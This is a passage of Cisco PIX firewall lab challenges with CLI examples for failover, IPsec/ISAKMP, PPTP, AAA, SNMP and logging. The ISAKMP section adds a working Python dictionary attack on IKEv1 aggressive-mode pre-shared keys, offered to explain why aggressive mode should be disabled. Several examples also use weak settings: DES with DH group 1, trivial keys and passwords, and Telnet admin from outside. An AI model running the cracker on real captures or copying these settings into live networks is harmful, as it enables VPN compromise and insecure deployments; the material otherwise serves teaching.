standby Configure the standby IP address after this keyword
myPIX (config)# fai int ip ANY 157.202.212.2 255.255.255.0 stan ?
configure mode commands/options:
Hostname or A.B.C.D Specify the IP address
myPIX (config)# fai int ip ANY 157.202.212.2 255.255.255.0 stan 157.202.212.3 ?
configure mode commands/options:
<cr>
myPIX (config)# failover interface ip outside 157.202.212.2 255.255.255.0 standby 157.202.212.3
myPIX (config)# failover interface ip inside 73.105.56.11 255.255.255.0 standby 73.105.56.12
myPIX (config)# failover interface ip inf2 166.209.230.11 255.255.255.0 standby 166.209.230.12
myPIX (config)# failover polltime 2
myPIX (config)# failover lan ?
configure mode commands/options:
enable     Enable LAN-Based failover
interface  Configure the interface and vlan to be used for failover
           communication
unit       Configure the unit as primary or secondary
myPIX (config)# failover key mypix
myPIX (config)# failover lan unit primary
myPIX (config)# failover lan interface inf2 e2
myPIX (config)# failover lan enable
myPIX (config)# show running failover

Cisco PIX Challenge 21


Outline
This challenge involves the configuration of failover for a secondary device over a LAN.
Objectives
The objectives of this challenge are to:

Enable failover.
Define failover addresses.
Define failover parameters.

Example (V6.x)
myPIX (config)# failover active
myPIX (config)# failover ip address outside 157.202.212.2
myPIX (config)# failover ip address inside 73.105.56.11
myPIX (config)# failover ip address inf2 166.209.230.11
myPIX (config)# failover poll 2
myPIX (config)# failover lan key mypix
myPIX (config)# failover lan unit secondary
myPIX (config)# failover lan interface inf2
myPIX (config)# failover lan enable
myPIX (config)# show failover


Example (V7.x)
myPIX (config)# failover active
myPIX (config)# failover interface ip outside 157.202.212.2 255.255.255.0 standby 157.202.212.3
myPIX (config)# failover interface ip inside 73.105.56.11 255.255.255.0 standby 73.105.56.12
myPIX (config)# failover interface ip inf2 166.209.230.11 255.255.255.0 standby 166.209.230.12
myPIX (config)# failover polltime 2
myPIX (config)# failover key mypix
myPIX (config)# failover lan unit secondary
myPIX (config)# failover lan interface inf2 e2
myPIX (config)# failover lan enable
myPIX (config)# show failover

Cisco PIX Challenge 22


Outline
This challenge involves the configuration of ISAKMP.
Objectives
The objectives of this challenge are to:

Define ISAKMP.
Define ISAKMP policy.
Enable ISAKMP on an interface.

Example
myPIX (config)# isakmp
Usage: isakmp policy <priority> authen <pre-share|rsa-sig>
isakmp policy <priority> encrypt <aes|aes-192|aes-256|des|3des>
isakmp policy <priority> hash <md5|sha>
isakmp policy <priority> group <1|2|5>
isakmp policy <priority> lifetime <seconds>
isakmp key <key-string> address <ip> [netmask <mask>] [no-xauth] [noconfig-mode]
isakmp enable <if_name>
isakmp identity <address|hostname|key-id> [<key-id-string>]
isakmp keepalive <seconds> [<retry seconds>]
isakmp nat-traversal [<natkeepalive>]
isakmp client configuration address-pool local <poolname> [<pif_name>]
isakmp peer fqdn|ip <fqdn|ip> [no-xauth] [no-config-mode]
myPIX (config)# help isakmp
USAGE:
isakmp am-disable
isakmp ipsec-over-tcp [port <port1>..<port10>]
isakmp disconnect-notify
(DEPRECATED) isakmp key <keystring> address <peer-address> [netmask <mask>]
[no-xauth] [no-config-mode]
isakmp enable <if_name>
isakmp identity {auto|address|hostname|key_id <key_id_str>}
(DEPRECATED) isakmp keepalive <threshold> [<retry-interval>]
isakmp nat-traversal [<natkeepalive>]
(DEPRECATED) isakmp client configuration address-pool local <pool-name>
[<if_name>]
(DEPRECATED) isakmp peer fqdn | ip <fqdn | ip> {no-xauth | no-mode-cfg}
isakmp policy <priority> authen {<pre-share|rsa-sig|dsa-sig>}
isakmp policy <priority> encrypt {<des|3des|aes|aes-192|aes-256>}
isakmp policy <priority> group {<1|2|5|7>}
isakmp policy <priority> hash {<md5|sha>}
isakmp policy <priority> lifetime <seconds>
isakmp reload-wait
DESCRIPTION:
isakmp

Configure ISAKMP key, peer, policy and other options

SYNTAX:
am-disable         Disable inbound aggressive mode connections
ipsec-over-tcp     Enable and configure IPSec over TCP
port               Set IPSec over TCP ports
<port1..port10>    Specify up to 10 IPSec over TCP ports
disconnect-notify  Enable disconnect notification to peers
key                Configure a pre-shared key associated with a peer
                   This command is deprecated. Refer to
                   'tunnel-group ipsec-attributes' instead
<keystring>
String (ASCII) to be used for authentication pre-share
<peer-address>
IP address of peer associated with pre-shared key
<mask>
Netmask specified in dotted-decimal notation
no-xauth
Specifies an xauth policy exception
no-mode-config
Specifies a config mode policy exception
enable
Enable ISAKMP on specified interface
<if_name>
Interface name on which to enable ISAKMP
identity
Set identity type (address,hostname or key-id)
<address>
Use IP address of the interface for the identity
<auto>
Identity auto(IP address for preshared key and
Cert DN for Cert based connections)
<hostname>
Use hostname of the device for the identity
<key-id>
Use specified key-id string for the identity
<key-id-str>
The string to be used as key-id
keepalive
Set keepalive interval. This command is deprecated.
Refer to 'tunnel-group ipsec-attributes' instead
<threshold>
Time, in seconds, peer can remain idle before
keep-alive monitoring commences
<retry-interval>
Time, in seconds, between keep-alive messages
nat-traversal
Enable and configure nat traversal
<natkeepalive>
Set nat traversal keepalive interval
<priority>
Policy suite priority (1 highest, 65535 lowest)
authentication
Authentication method (pre-share,rsa-sig or dsa-sig)
encryption
Encryption algorithm (des,3des,aes,aes-192 or aes256)
hash
Hash algorithm (md5 or sha)
group
Diffie-Hellman group (1,2,5 or 7)
lifetime
ISAKMP SA lifetime (seconds)
client configuration address-pool local
Configure client IP address pool attribute
This command is deprecated. Refer to 'ip local-pool',
'tunnel-group general-attributes address-pool' instead
<pool-name>
Name of ip local pool to allocate dynamic client ip
<if_name>
Interface name the ip local pool is associated with
Defaults to 'outside' if not specified

peer               Identify a peer security gateway to exempt from Xauth
                   and/or Mode Configuration. This command is deprecated.
                   Refer to 'isakmp identity' instead
<fqdn | ip>        Fully qualified domain name or IP address of a remote
                   peer to be exempted from xauth or config mode policy
reload-wait        Wait for voluntary termination of sessions before reboot
see also:          ca, dynamic-map, ipsec, map
(config)# isakmp enable outside
(config)# isakmp key ABC&FDD address 176.16.0.2 netmask 255.255.255.255
(config)# isakmp identity address
(config)# isakmp policy 5 authen pre-share
(config)# isakmp policy 5 encrypt des
(config)# isakmp policy 5 hash sha
(config)# isakmp policy 5 group 1
(config)# isakmp policy 5 lifetime 86400
(config)# show isakmp
The policy above (des, Diffie-Hellman group 1, a seven-character pre-shared key) is the weakest combination this help output allows. On a real device choose aes or aes-256 with group 5 from the options listed, and use a long random pre-shared key: with pre-share authentication the key is the only thing that authenticates the peer.
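The 7.x help above lists isakmp am-disable (disable inbound aggressive mode). With authen pre-share and hash sha, as in the policy just configured, IKEv1 aggressive mode sends HASH_R and every input to it unencrypted, so a captured exchange lets an attacker test pre-shared keys offline; main mode encrypts the hash payloads, which is why aggressive mode should be disabled when pre-shared keys are used. The following added Python, example code for this page rather than NetworkSims or Cisco code, computes SKEYID and HASH_R as RFC 2409 defines them and runs a small dictionary against a captured value. The cookies, nonces, Diffie-Hellman values, SA payload body, identity payload and wordlist are constructed stand-ins for a real capture.

```python
"""Why 'isakmp am-disable' matters: with 'authen pre-share' and 'hash sha',
IKEv1 aggressive mode puts HASH_R on the wire in the clear, and every other
input to it is also visible, so a captured exchange can be used to test
candidate pre-shared keys offline (RFC 2409, section 5.4). Added example,
not NetworkSims or Cisco code; the nonces, DH values, cookies, SA payload
body and identity payload are constructed bytes that stand in for a capture."""
import hashlib
import hmac
import os


def prf(key, data):
    return hmac.new(key, data, hashlib.sha1).digest()    # 'isakmp policy 5 hash sha'


def skeyid_psk(psk, ni, nr):
    """SKEYID = prf(pre-shared-key, Ni_b | Nr_b) for pre-shared-key authentication."""
    return prf(psk, ni + nr)


def hash_r(psk, ex):
    """HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)."""
    sk = skeyid_psk(psk, ex["ni"], ex["nr"])
    return prf(sk, ex["g_xr"] + ex["g_xi"] + ex["cky_r"] + ex["cky_i"]
               + ex["sai_b"] + ex["idir_b"])


def capture(psk):
    """Constructed stand-in for the two aggressive-mode messages a sniffer sees."""
    ex = {
        "cky_i": os.urandom(8), "cky_r": os.urandom(8),          # ISAKMP cookies
        "ni": os.urandom(20), "nr": os.urandom(20),              # nonce payloads
        "g_xi": os.urandom(96), "g_xr": os.urandom(96),          # group 1: 768-bit values
        "sai_b": bytes.fromhex("00000001000000010000002801010001"),   # SA payload body
        "idir_b": bytes([1, 0, 0, 0]) + bytes([176, 16, 0, 2]),  # ID_IPV4_ADDR 176.16.0.2
    }
    ex["hash_r"] = hash_r(psk, ex)       # the responder sends this unencrypted
    return ex


def crack(ex, wordlist):
    """Offline test of candidate PSKs against the captured HASH_R; no peer contact."""
    for candidate in wordlist:
        if hmac.compare_digest(hash_r(candidate, ex), ex["hash_r"]):
            return candidate
    return None


WORDLIST = [b"cisco", b"password", b"ABC&FDD", b"mypix"]    # constructed wordlist


def demo():
    ex = capture(b"ABC&FDD")             # the key from the example above
    return crack(ex, WORDLIST)


def demo_strong():
    ex = capture(os.urandom(32))         # random 256-bit key: in no wordlist
    return crack(ex, WORDLIST)
```

Nothing in crack() touches the peer, so lockouts and logging on the firewall never see the attempt; the only defences are a key with enough entropy that dictionary and brute-force search fail, or not offering aggressive mode with pre-shared keys at all, which on this platform is isakmp am-disable together with main mode or certificate (rsa-sig) authentication.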

Cisco PIX Challenge 23


Outline
This challenge involves the configuration of crypto details.
Objectives
The objectives of this challenge are to:

Enable IPSEC.
Define a crypto map.
Apply a crypto map.

Example
(config)# help sysopt
USAGE:
[no] sysopt connection { permit-ipsec |
timewait | {tcpmss [minimum] <bytes>}
[no] sysopt noproxyarp <if-name>
[no] sysopt nodnsalias { inbound | outbound }
[no] sysopt radius ignore-secret
[no] sysopt uauth allow-http-cache
show running-config [all] sysopt
clear configure sysopt
DESCRIPTION:
sysopt
Set system functional option
SYNTAX:
connection permit-ipsec
- Exempt IPSec traffic from access check.
connection timewait
- TCP conn undergoes TIMEWAIT state.
connection tcpmss
- Set maximum limit of TCP MSS to <bytes>.
connection tcpmss minimum - Set minimum limit of TCP MSS to <bytes>.
noproxyarp <if-name>
- Disable proxy arp on interface <if-name>.
nodnsalias inbound
- Disable alias inbound DNS A record translation.
nodnsalias outbound
- Disable alias outbound DNS A record translation.
radius ignore-secret
- Ignore secret in RADIUS accounting responses.
uauth allow-http-cache
- Allow browser to use cached user credentials.
see also: alias, ca, ipsec, isakmp, map, dynamic-map
(config)# sysopt connection permit-ipsec
(config)# help cry
USAGE:
crypto { ca | dynamic-map | ipsec | isakmp | key | map }
For more detailed help, please refer directly to the subcommands
DESCRIPTION:
crypto
Configure IPsec, IKE, Certificate Authority and Long Term
Key Operations
SYNTAX:
ca
Configure the Certification Authority
See "crypto ca ?" or "help ca"
dynamic-map
IPSec crypto dynamic-map policy
See "crypto dynamic-map ?" or "dynamic-map ?" or
"help dynamic-map"
ipsec
Configure transform-set and IPSec SA lifetime
See "crypto ipsec ?" or "ipsec ?" or "help ipsec"
isakmp
IKE policy and configuration
See "crypto isakmp ?" or "isakmp ?" or "help isakmp"
key
Long term key operations
See "crypto key ?" or "help key"
map
IPSec crypto map policy
See "crypto map ?" or "map ?" or "help map"

(config)# crypto ipsec transform-set MYIPSECFORMAT esp-des esp-sha-hmac
(config)# crypto map MYIPSEC 10 ipsec-isakmp
(config)# access-list 111 permit ip 10.0.0.0 255.255.255.0 176.16.0.0 255.255.255.0
(config)# crypto map MYIPSEC 10 match address 111
(config)# crypto map MYIPSEC 10 set peer 176.16.0.2
(config)# crypto map MYIPSEC 10 set transform-set MYIPSECFORMAT
(config)# crypto map MYIPSEC interface outside

Cisco PIX Challenge 24


Outline
This challenge involves the configuration of VPDN.


Objectives
The objectives of this challenge are to:

Enable PPTP.
Define local pool.
Create VPDN group.
Enable VPDN on an interface.

Example
(config)# sysopt connection permit-pptp
(config)# help ip
USAGE:
ip local pool <poolname> <ip1>[-<ip2>] [mask <netmask>]
ip verify reverse-path interface <if_name>
ip audit {info|attack} action [alarm] [drop] [reset]
ip audit name <audit_name> {info|attack} [action [alarm] [drop] [reset]]
ip audit interface <if_name> <audit_name>
ip audit signature <sig_number> disable
show|clear ip audit count [global] [interface <interface>]
clear configure ip audit [configuration]
DESCRIPTION:
ip
Define a local address pool
Configure Unicast RPF on an interface
Configure the Intrusion Detection System
SYNTAX:
<poolname> name of the local address pool
<ip1>-[<ip2>] address range of the local address pool
<netmask> network mask of the local address pool
<if_name> The name designated for the interface by the nameif command
info IDS informational signatures.
attack IDS attack signatures.
alarm When a signature match is detected, report the event
to syslog servers.
drop When a signature match is detected, drop the offending
packet.
reset When a signature match is detected, drop the offending
packet and close the connection if it is part of an
active connection.
<audit_name> Audit policy name.
<sig_number> IDS signature number.
see also:
interface, ip address (interface sub-mode command),
show interface, isakmp
(config)# ip local pool pptp-pool 10.0.0.1-10.0.0.100

(config)# help vpd
USAGE:
vpdn group <name>
accept dialin l2tp
ppp authentication pap|chap|mschap|eap
This command has been deprecated. New syntax:
tunnel-group <name> ppp-attributes
authentication pap
authentication chap
authentication mschap
authentication eap |
client configuration address local <address_pool_name> |
client configuration dns <dns_ip1> [<dns_ip2>]|
client configuration wins <wins_ip1> [<wins_ip2>]|
client authentication local|aaa <auth_aaa_group>|
client accounting <acct_aaa_group>|
l2tp tunnel hello <hello_time>
show vpdn tunnel [l2tp|pppoe] [id <tnl_id>|packets|state|summary|transport]
show vpdn session [l2tp|pppoe] [id <sess_id>|packets|state|window]
show vpdn pppinterface [id <dev_id>]
show vpdn group [<group_name>]
show vpdn username [user_name]
clear vpdn [group|interface|tunnel|username]
DESCRIPTION:
vpdn
Configure VPDN (L2TP, PPPoE) Policy
SYNTAX:
<address_pool_name> local address pool name
<dns_ip> DNS server ip address
<wins_ip> WINS server ip address
<auth_aaa_group> Authentication AAA server group name
<acct_aaa_group> Accounting AAA server group name
<hello_time> l2tp tunnel keep-alive hello timeout value (seconds)
<if_name> Interface to accept L2TP request
<name> user name
<passwd> user password
<tnl_id> tunnel id
<sess_id> session id
<store-local> Store in local flash instead of using external config
see also:
crypto, aaa-server, ip local pool
(config)# vpdn group 1 accept dialin pptp
(config)# vpdn group 1 ppp authentication mschap
(config)# vpdn group 1 ppp encryption mppe 40
(config)# vpdn group 1 client configuration address local pptp-pool
(config)# vpdn group 1 client configuration dns 172.64.10.1
(config)# vpdn group 1 client authentication local
(config)# vpdn enable outside

Cisco PIX Challenge 25


Outline
This challenge involves the configuration of URL filtering.


Objectives
The objectives of this challenge are to:

Setup Websense.
Define URL filtering.
Define URL cache distance.

Example
(config)# help url-server
USAGE:
[no] url-server <(if_name)> [vendor websense] host <local_ip> [timeout <seconds>] [protocol TCP|UDP [version 1|4] [connections <num_conns>]]
[no] url-server <(if_name)> vendor n2h2 host <local_ip> [port <number>] [timeout <seconds>] [protocol TCP|UDP [connections <num_conns>]]
show url-server stat
clear url-server stat
DESCRIPTION:
url-server
Specify a URL filter server
SYNTAX:
<if_name>
The network interface where the URL filtering server resides.
<vendor_name>
The url-server vendor.
The default is Websense. All configured url-servers must have
the same vendor. To change vendors first clear out the existing
url-server configuration.
<local_ip>
The IP address of the URL filtering server
[port <N>]
Optional N2H2 port value
Defines which port on the N2H2 server to connect to (for both
UDP and TCP).
All configured url-servers must have the same port. To change
first clear out the existing url-server configuration.
[timeout <N>]
Optional timeout value
Timeout value in seconds for down URL filter server
[protocol TCP|UDP [version 1|4]]
Optional definition on protocol
communicating to Websense in TCP or UDP (only applicable in 4)
and definition to talk to Websense in protocol version 1 or
protocol version 4. The optional version number defaults to 1.
The N2H2 url-server doesn't have a version number.
<num_conns>
The number of TCP connections created from the PIX to
the url-server.
stat
To print out url server usage statistics
see also:
filter, url-cache
myPIX (config)# url-server (inside) vendor websense host 192.168.1.1 timeout 47
myPIX (config)# help filter
USAGE:
[no] filter url <port>[-<port>]|except <lcl_ip> <mask> <frgn_ip> <mask>
[allow] [proxy-block] [longurl-truncate | longurl-deny] [cgi-truncate]
[no] filter ftp <port>[-<port>]|except <lcl_ip> <mask> <frgn_ip> <mask>
[allow] [interact-block]
[no] filter https <port>[-<port>]|except <lcl_ip> <mask> <frgn_ip> <mask>
[allow]
[no] filter activex|java <port>[-<port>]|except <lcl_ip> <mask> <frgn_ip> <mask>
DESCRIPTION:
filter
Enable, disable, or view URL, FTP, and HTTPS filtering
SYNTAX:
url|ftp|https|java|activex
Keyword to turn on URL, FTP, HTTPS, Java,
or ActiveX filtering
<port>[-<port>] TCP port number range
except
Create an exception to previously specified set of IP
<lcl_ip>
The address of local/internal host which is source
for connections requiring filtering.
<frgn_ip>
The address of foreign/external host which is
destination for connections requiring filtering.
<mask>
Network mask to apply to lcl_ip or frgn_ip
[allow]
When url-server is down, allow outbound <service> traffic
[proxy-block]
Prevent users from connecting to an HTTP proxy server
[longurl-truncate]
When a long URL has exceeded the buffer limit,
truncate the URL sent to the url-server by only sending the
destination hostname or IP address
[longurl-deny]
When the long URL buffer is not available, deny
outbound URL traffic
[cgi-truncate]
When a URL has a parameter list prefixed by '?' (e.g. a
CGI script) truncate the URL sent to the url-server by
removing all text after and including '?'
[interact-block]
Prevent users from connecting FTP server
by interactive FTP program
see also:
url-server (Only apply on URL-filtering)
myPIX (config)# filter url http 0 0 0 0
myPIX (config)# filter url except 204.76.192.7 255.255.252.0 0 0 allow
myPIX (config)# url-cache dst 2

Cisco PIX Challenge 26


Outline
This challenge involves the configuration of local AAA.
Objectives
The objectives of this challenge are to:

Define local AAA.
Define authentication.

Example
myPIX (config)# help aaa-server
USAGE:
[no] aaa-server <tag> <(if_name)> host <ip_address>
[no] aaa-server <tag> protocol <protocol>
clear configure aaa-server [<tag>]
show running-config [all] aaa-server [<tag> [<(if_name)>
host <ip_address>]]
show aaa-server [<tag> [host <hostname>]]
show aaa-server protocol <protocol>
clear aaa-server statistics [<tag> [host <hostname>]]
clear aaa-server statistics protocol <protocol>
test aaa-server authentication <group tag> [host <ip_address>]
[username <user>] [password <password>]
test aaa-server authorization <group tag> [host <ip_address>]
[username <user>]
DESCRIPTION:
aaa-server
Define AAA Server group
SYNTAX:
<tag>
Symbolic name of the server group.
<if_name>
The network interface where the authentication server
resides.
<local_ip>
The IP address of the AAA server.
<protocol>
The AAA protocol supported by servers in the group.
Supported protocol types are radius, tacacs+, sdi,
nt, kerberos and ldap
<acct mode>
Specify either 'simultaneous' or 'single' mode
accounting
<reactivation mode>
Specify the method by which failed servers are
reactivated. Either timed or depletion.
see also:
aaa,nameif
myPIX (config)# aaa-server orange protocol local
myPIX (config-aaa-server-group)# exit
myPIX (config)# username fred password bert
myPIX (config)# help aaa
USAGE:
[no] aaa mac-exempt match <mac-list-id>
[no] aaa authentication secure-http-client
[no] aaa authentication|authorization|accounting include|exclude <svc>
<if_name> <l_ip> <l_mask> [<f_ip> <f_mask>] <server_tag>
[no] aaa authentication serial|telnet|ssh|http|enable console
<server_tag> [LOCAL]
[no] aaa accounting telnet|ssh|http|serial|enable console <server_tag>
[no] aaa authentication|authorization|accounting match
<access_list_name> <if_name> <server_tag>
[no] aaa authorization command {LOCAL | <tacacs_server_tag> [LOCAL]}
[no] aaa accounting command {privilege <level>} <tacacs_server_tag>
[no] aaa proxy-limit <proxy limit> | disable
[no] aaa local authentication attempts max-fail <fail-attempts>
clear configure aaa
clear aaa local user {fail-attempts|lockout} {all | username <uname>}}
show running-config [all] aaa [authentication|authorization|accounting
|max-exempt|proxy-limit]
show aaa local user [lockout]
DESCRIPTION:
aaa
Enable, disable, or view TACACS+, RADIUS or LOCAL
user authentication, authorization and accounting
SYNTAX:
secure-http-client
HTTP client authentication is secured (over SSL)
include|exclude
Include or exclude the service, local and foreign network which
needs to be authenticated, authorized, and accounted
<svc>
For Authentication, use the following values:
telnet, ftp, http, https, tcp/<port> and tcp/0.
For Authorization, use the following values:
telnet, ftp, http, https, tcp/0, tcp/<port>, udp/<port>,
icmp/<port> or <protocol>[</port>]
For Accounting, use the following values:
telnet, ftp, http, https, tcp/0, tcp/<port>, udp/<port>,
icmp/<port> or <protocol>[</port>]
For authentication of console access, telnet access, SSH access
and enable mode access, specify telnet|ssh|enable respectively.
<if_name>
Authenticate, authorize or account connections
originated at an interface.
<l_ip>
The address of the local/internal host which is source or
destination for connections requiring authentication
<l_mask>
Network mask to apply to <l_ip>
<f_ip>
The address of the foreign host which is either source or
destination for connections requiring authentication
<f_mask>
Network mask to apply to <f_ip>
<server_tag>
For Authentication and Accounting, use values defined
by aaa-server command.
For cut-through and 'to the box' Authentication and Command
Authorization, the server tag LOCAL, can also be used.
Only tacacs+ is supported for 'through the box' Authorization.
LOCAL
Predefined server tag for aaa protocol 'local'
The server tag LOCAL can also be used as a fallback method in
case of the AAA server tag being unreachable. The AAA Fallback
is available only for 'to the box' authentication and command
authorization. The fallback method can only be LOCAL and it can
be used only if a AAA server is specified for the server_tag
<proxy limit>
Number of concurrent proxy connections allowed per user.
<fail-attempts> Number of failed authentication attempts after which user is locked
out
<uname> Locally configured username
see also:
aaa-server
username
myPIX (config)# aaa authentication http console orange
myPIX (config)# aaa authentication serial console orange
myPIX (config)# aaa authentication telnet console orange
myPIX (config)# aaa authentication enable console orange

Cisco PIX Challenge 27


Outline
This challenge involves the configuration of remote AAA.
Objectives
The objectives of this challenge are to:

Enable AAA.
Define authentication.

Example
myPIX (config)# aaa-server orange protocol radius
myPIX (config)# aaa-server orange (inside) host 155.109.40.4 beetroot
myPIX (config)# aaa authentication http console orange
myPIX (config)# aaa authentication serial console orange
myPIX (config)# aaa authentication telnet console orange

Cisco PIX Challenge 28


Outline
This challenge involves the configuration of Telnet, SSH, and HTTP access.
Objectives
The objectives of this challenge are to:

Define Telnet access on interfaces.
Define SSH access on interfaces.
Enable HTTP server.
Define HTTP access on interfaces.
Define timeouts for servers.

Example
myPIX (config)# telnet 204.134.17.7 255.255.192.0 inside
myPIX (config)# telnet 201.13.14.2 255.255.240.0 outside
myPIX (config)# telnet 210.1.170.5 255.255.224.0 inf2
myPIX (config)# telnet timeout 10
myPIX (config)# show telnet
myPIX (config)# show telnet timeout
myPIX (config)# ssh 204.134.17.7 255.255.192.0 inside
myPIX (config)# ssh timeout 10
myPIX (config)# http server enable
myPIX (config)# http 204.134.17.7 255.255.192.0 inside
myPIX (config)# http 201.13.14.2 255.255.240.0 outside

Cisco PIX Challenge 29


Outline
This challenge involves the configuration of SNMP.
Objectives
The objectives of this challenge are to:

Define SNMP community.
Define SNMP location.
Define SNMP host.
Define SNMP contact.
Enable SNMP traps.

Example
> en

myPIX # config t
myPIX (config)# help snmp-server
USAGE:
[no] snmp-server community|contact|location <text>
[no] snmp-server host <if_name> <local_ip> [trap|poll]
[community <text>] [version {1|2c}] [udp-port <port>]
[no] snmp-server enable [traps [all | <feature> [<trap1> ... <trapn>]]]
show snmp-server statistics
show running-config [all] snmp-server
clear configure snmp-server
DESCRIPTION:
snmp-server
Provide SNMP and event information
SYNTAX:
community
Configure the community string.
contact
Text for mib object sysContact.
location
Text for mib object sysLocation.
<text>
The contact person name, location, or community string.
host
Specify hosts to receive SNMP traps and send SNMP polls.
<if_name>
The network interface where the SNMP management station resides.
<local_ip>
The address of the SNMP management station.
[trap|poll]
specify whether the host can poll or receive traps.
Default is both.
udp-port
Override the default SNMP trap port.
Only valid when host may receive traps.
<port>
The port to which traps will be sent.
version
SNMP version to use for notification message.
[1|2c]
Use SNMPv1 or SNMPv2c.
enable
Enable/Disable snmp-server or particular traps.
traps
Enable/disable particular traps to SNMP management station(s).
all
Enable/disable traps for all features.
<feature>
The feature for which traps are enabled.
<trapn>
A specific trap to enable.
listen-port
Configure the SNMP engine's listening port.
statistics
Show snmp-server statistics.
see also:
logging
myPIX (config)# snmp-server
Not enough arguments.
Usage: [no] snmp-server community|contact|location <text>
[no] snmp-server host [<if_name>] <local_ip> [trap|poll]
[no] snmp-server enable traps
myPIX (config)# snmp-server community oldest ro
myPIX (config)# snmp-server location edinburgh
myPIX (config)# snmp-server host inside 160.61.110.11
myPIX (config)# snmp-server contact june
myPIX (config)# snmp-server enable traps

Cisco PIX Challenge 30


Outline
This challenge involves the configuration of logging.
Objectives
The objectives of this challenge are to:

Enable logging.
Define logging levels.

Example
> en
myPIX # config t
myPIX (config)# help logg
USAGE:
[no] logging enable
[no] logging timestamp
[no] logging standby
[no] logging debug-trace
[no] logging emblem
[no] logging flash-bufferwrap
[no] logging flash-minimum-free <kbytes>
[no] logging flash-maximum-allocation <kbytes>
[no] logging ftp-bufferwrap
[no] logging ftp-server <ftp-server> <path> <username> <password>
[no] logging buffer-size <bytes>
[no] logging permit-hostdown
[no] logging from-address <mail-address>
[no] logging recipient-address <mail-address> [level <level>]
[no] logging host <in_if> <l_ip> [{tcp|6}|{udp|17}[/<port#>]] [format emblem]
[no] logging console <level>|<list>
[no] logging buffered <level>|<list>
[no] logging mail <level>|<list>
[no] logging monitor <level>|<list>
[no] logging history <level>|<list>
[no] logging trap <level>|<list>
[no] logging message <syslog_id> level <level>
[no] logging asdm <level>|<list>
[no] logging asdm-buffer-size <num_of_msgs>
[no] logging facility <fac>
[no] logging device-id {hostname | ipaddress <if_name>
| string <text> | context-name}
[no] logging queue <queue_size>
[no] logging rate-limit <unlimited | <num> [interval]> message
<syslog_id> (FWSM only)
[no] logging rate-limit <unlimited | <num> [interval]> level
<syslog_level> (FWSM only)
[no] logging class <class> <dest1> <level> [<dest2> <level>..]
[no] logging list <list> level <level> [class <class>]
[no] logging list <list> message <syslog_id1>[-<syslog_id2>]
clear logging buffer
clear config logging [disable | level | rate-limit | asdm]
show logging [{message [<syslog_id>|all]} | setting | asdm]
show running-config [all] logging [level | disabled | rate-limit]
DESCRIPTION:
logging
Enable logging facility
SYNTAX:
enable Enable logging to all supported destinations
timestamp Enable logging time-stamp on syslog file
standby Enable logging on standby unit with failover enabled
debug-trace redirect debug trace output to syslog
ftp-server Set external ftp server info
<ftp-server> FTP server name or IP address
<path> Directory PATH on ftp server for saved log file
<username> User login on ftp server
<password> Password for username
buffer-size Specify the logging buffer size
<bytes> Logging buffer in bytes. Default/min. is 4096, and
max. is 1048576 bytes
permit-hostdown Allow new connection even if TCP syslog server
is down
class
Specify logging event class
<class>
Logging event class name
<destN>
Logging output destination, ie: console, buffer...
list
Specify logging event list
<list>
Logging event list name
host
Send messages to a host
console
Set console logging level
buffered
Copy logging messages to an internal buffer
history
Set SNMP Syslog traps logging level
trap
Set Syslog messages logging level
asdm
Set ASDM logging syslog level
asdm-buffer-size
Set ASDM logging buffer size
message
Disable reporting of this syslog message
device-id
Include the specified device ID in all non-EMBLEM
syslog messages
context-name
Sets the device ID to be the name of the current context
rate-limit
Limit the rate at which syslog is generated
unlimited
Keyword to denote rate limit is disabled
<in_if>
The internal interface name, as specified
by the 'nameif' command
<l_ip>
The IP address of the host receiving the syslog messages
<emblem>
Log messages in Cisco EMBLEM format (available only for UDP)
<fac>
Eight facilities, 16(LOCAL0) - 23(LOCAL7)
The default is 20(LOCAL4), syslog hosts organize messages
based on the facility number. The facility may also be set to
0 - 15, but is only recommended for system use.
<level>
Sets the level above which the device suppresses
messages to the syslog host
0 - System Unusable
1 - Take Immediate Action
2 - Critical Condition
3 - Error Message
4 - Warning Message
5 - Normal but significant condition
6 - Informational
7 - Debug Message
<syslog_id>
The ID of the syslog to suppress reporting
<num>
Number at which the syslog(s) is to be rate limited
<interval>
Time interval (in seconds) over which the syslogs should
be limited to 'num'. This parameter is optional and if not
specified the default is 1 sec
<syslog_level> The level for which all the syslogs should be rate limited
<queue_size>
The length limit of log queue, 0 - unlimited
<if_name>
interface name
<text>
user-defined device ID
all
This displays all the syslog_ids and their corresponding levels
from-address
Specify from address of mail logging message
recipient-address
Specify recipient address of mail logging message.
A maximum of 5 recipient addresses can be specified
flash-bufferwrap
Save logging buffer to flash when buffer wraps
ftp-bufferwrap
Save logging buffer to external ftp server when
buffer wraps
flash-minimum-free
Minimum free flash space logging must maintain
flash-maximum-allocation
Maximum flash space logging can consume
<kbytes>
Size in Kilo Bytes
myPIX (config)# logging ?
Usage: [no] logging on
[no] logging timestamp
[no] logging standby
[no] logging host [<in_if>] <l_ip> [tcp|udp/port#] [format {emblem}]
[no] logging console <level>
[no] logging buffered <level>
[no] logging monitor <level>
[no] logging history <level>
[no] logging trap <level>
[no] logging message <syslog_id> level <level>
[no] logging facility <fac>
[no] logging device-id hostname | ipaddress <if_name>
| string <text>
logging queue <queue_size>
show logging [{message [<syslog_id>|all]} | level | disabled]
myPIX (config)# logging on
myPIX (config)# logging host 197.38.34.10
myPIX (config)# logging trap informational
myPIX (config)# logging monitor informational
myPIX (config)# loggin console informational
myPIX (config)# logging buffer informational

Cisco PIX Challenge 31


Outline
This challenge involves the configuration of PPPoE.

Objectives
The objectives of this challenge are to:

Define IP addresses of interfaces.
Define a VPDN group.
Apply PPPoE.

Example (Ver 6.x)
myPIX # config t
myPIX (config)# ip address outside 212.246.206.7 255.255.255.0
myPIX (config)# ip address inside 22.229.82.10 255.255.255.0
myPIX (config)# ip address inf2 165.31.47.6 255.255.255.0
myPIX (config)# vpdn group 7 request dialout pppoe
myPIX (config)# vpdn group 7 localname newmexico
myPIX (config)# vpdn group 7 ppp authen pap
myPIX (config)# vpdn username daniel password dates
myPIX (config)# ip address outside pppoe setroute

Example (Ver 7.x)
myPIX (config)# int e0
myPIX (config-if)# nameif outside
myPIX (config-if)# ip address 192.168.1.1 255.255.255.0
myPIX (config-if)# no shutdown
myPIX (config-if)# exit
myPIX (config)# int e1
myPIX (config-if)# nameif inside
myPIX (config-if)# ip address 192.168.2.1 255.255.255.0
myPIX (config-if)# no shutdown
myPIX (config-if)# exit
myPIX (config)# int e2
myPIX (config-if)# nameif inf2
myPIX (config-if)# ip address 192.168.3.1 255.255.255.0
myPIX (config-if)# no shutdown
myPIX (config-if)# exit
